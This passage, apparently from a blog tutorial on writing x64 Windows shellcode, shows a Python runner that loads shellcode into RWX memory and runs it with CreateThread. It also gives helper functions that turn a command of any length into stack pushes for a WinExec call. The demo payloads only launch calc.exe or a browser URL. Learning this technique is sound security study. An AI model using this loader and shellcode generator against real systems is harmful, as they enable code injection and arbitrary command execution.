        output += "\\x{0:02x}".format(int(opcode)).rstrip("\n") # For printable shellcode


    shellcode = bytearray(sh)
    print("Shellcode: "  + output )
    print("Bytes: " + str(len(sh)))
    print("Attaching debugger to " + str(os.getpid()));
    subprocess.Popen(["WinDbgX", "/g","/p", str(os.getpid())], shell=True)
    input("Press any key to continue...");

    ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_void_p
    ctypes.windll.kernel32.RtlMoveMemory.argtypes = ( ctypes.c_void_p, ctypes.c_void_p, ctypes.c_size_t ) 
    ctypes.windll.kernel32.CreateThread.argtypes = ( ctypes.c_int, ctypes.c_int, ctypes.c_void_p, ctypes.c_int, ctypes.c_int, ctypes.POINTER(ctypes.c_int) ) 

    space = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(shellcode)),ctypes.c_int(0x3000),ctypes.c_int(0x40))
    buff = ( ctypes.c_char * len(shellcode) ).from_buffer_copy( shellcode )
    ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_void_p(space),buff,ctypes.c_int(len(shellcode)))
    handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_void_p(space),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))
    ctypes.windll.kernel32.WaitForSingleObject(handle, -1);

if __name__ == "__main__":
    main()

Variable Length Command Input

Another improvement is to support commands of variable length, rather than having to manually encode each command. This can be implemented by replacing the calc.exe instructions with a function call:

       # "  xor rax, rax;"                  # Zero RAX to become a null byte
       # "  push rax;"                      # Push the null byte to the stack
       # "  mov rax, 0x6578652E636C6163;"   # Add calc.exe string to RAX.
       # "  push rax;"                      # Push RAX to stack
        "" +  str(command("explorer.exe https://www.bordergate.co.uk")) + ""
        "  mov rcx, rsp;"                   # Move a pointer to calc.exe into RCX.
        "  xor rdx,rdx;"                    # Zero RDX   
        "  inc rdx;"                        # RDX set to 1 = uCmdShow
        "  sub rsp, 0x20;"                  # Make some room on the stack so it's not clobbered by WinExec
        "  call r14;"                       # Call WinExec

Then add the following Python functions.

def encodeCommand(command):
    # Pad commands
    command = command.ljust(8, ' ')
    # Convert ASCII characters to bytes
    result = "".join("{:02x}".format(ord(c)) for c in command)
    # Reverse the bytes for little endian formatting
    ba = bytearray.fromhex(result)
    ba.reverse()
    return "0x" + ba.hex()

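def command(command):
    # Split command into 8 byte chunks
    size = 8
    chunks = [command[i:i+size] for i in range(0, len(command), size)]

    # Push a null qword first, so the string on the stack is null terminated
    output = "xor rax, rax; push rax; "

    # Pad with spaces so the total number of pushes is even and RSP stays 16-byte aligned
    if (len(chunks) % 2 == 0):
       output += "mov rax, " + encodeCommand("        ") + "; "
       output += "push rax; "

    # Push the chunks in reverse order, so the string reads forwards in memory
    for i in reversed(chunks):
        output += "mov rax, " + encodeCommand(i) + "; "
        output += "push rax; "

    return output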
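To see what the encoding step produces, the chunking can be reproduced with int.from_bytes and then reversed to confirm nothing is lost. This is a separate sketch rather than the functions above: to_immediates and from_immediates are hypothetical names, and the command is assumed to be plain ASCII.

```python
def to_immediates(command: str, size: int = 8) -> list:
    """Split a command into space-padded 8-byte chunks, as little-endian integers."""
    data = command.encode("ascii")
    chunks = [data[i:i + size].ljust(size, b" ") for i in range(0, len(data), size)]
    return [int.from_bytes(chunk, "little") for chunk in chunks]


def from_immediates(immediates: list, size: int = 8) -> str:
    """Rebuild the string as it would appear in memory, lowest address first."""
    return b"".join(value.to_bytes(size, "little") for value in immediates).decode("ascii")


cmd = "explorer.exe https://www.bordergate.co.uk"
immediates = to_immediates(cmd)

for value in immediates:
    print(hex(value))
print(repr(from_immediates(immediates)))
```

The immediates are listed in memory order; the generated assembly pushes them last chunk first, because the stack grows towards lower addresses. Padding with spaces rather than zeros keeps the generated instructions free of null bytes.
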

Closing Thoughts

This is fairly basic x64 shellcode. A few things to think about:

  • The target application will crash after executing our command. Cleanly exiting the application would require another function lookup, increasing the size of the code.
  • Having a general purpose function to look up multiple functions would be beneficial for more complex shellcode.